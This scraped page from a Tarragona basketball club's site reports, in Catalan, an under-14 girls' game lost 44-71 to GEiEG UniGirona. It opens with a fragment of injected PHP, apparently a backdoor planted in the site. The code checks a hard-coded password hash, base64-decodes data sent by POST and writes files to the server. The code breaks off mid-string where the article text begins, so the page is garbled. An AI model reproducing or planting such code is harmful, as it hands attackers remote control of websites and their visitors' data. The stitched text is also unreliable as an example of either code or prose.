function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'Infantil femení 07 A paga l'esforç de la remuntada després d'un mal inici i perd clarament contra el GEiEG UniGirona (44-71) - Tgn Bàsquet Club -

L’Infantil femení 07 A paga l’esforç de la remuntada després d’un mal inici i perd clarament contra el GEiEG UniGirona (44-71)

Updated: abril 26, 2021

Una altra mala sortida i un partit que es va posar d’esquena només començar. L’equip Infantil femení 07 A va encaixar un parcial de 0-18 en els primers 5 minuts de joc i semblava que deia adeu a les possibilitats de sorprendre el GEiEG UniGirona. Les jugadores que entrena Agustí Oriol van ser massa febles en defensa, permetent situacions de cistella fàcil de les gironines que penetraven en l’entramat defensiu de les locals com un ganivet a la mantega. El tècnic tarragoní va haver de demanar dos temps morts en aquest lapse de temps per demanar més intensitat a les seves jugadores i aquestes, finalment, li van fer cas. El TGN Bàsquet va marcar un parcial d’11-9 fins al final del període. Però la millora no es va quedar aquí. En el segon quart, el conjunt tarragoní va seguir pressionant a tota la pista i, en el cinc contra cinc, la defensa va ser molt més agressiva que en l’inici del matx. La retallada de diferències va ser tan gran que en el minut 17 de partit el marcador era de 27-31 i atac pel TGN Bàsquet.

Les locals havien fet una cosa que semblava impensable, retallar 14 punts al seu rival en 12 minuts. Però no van culminar la remuntada, i això va ser decisiu en la mentalitat dels dos equips (29-34). En el tercer quart tot semblava seguir el guió d’abans del descans, però les gironines han augmentat la seva pressió defensiva i les locals han començat a perdre pilotes. Això ha estat decisiu per entendre el parcial d’11-20 en aquest període. Les tarragonines, que havien defensat molt bé durant 15 minuts de partit, corrent el contraatac a tota velocitat, no han pogut desplegar aquest joc en la segona meitat víctimes de les seves imprecisions i de la defensa del GEiEG UniGirona que s’ha acabat imposant clarament.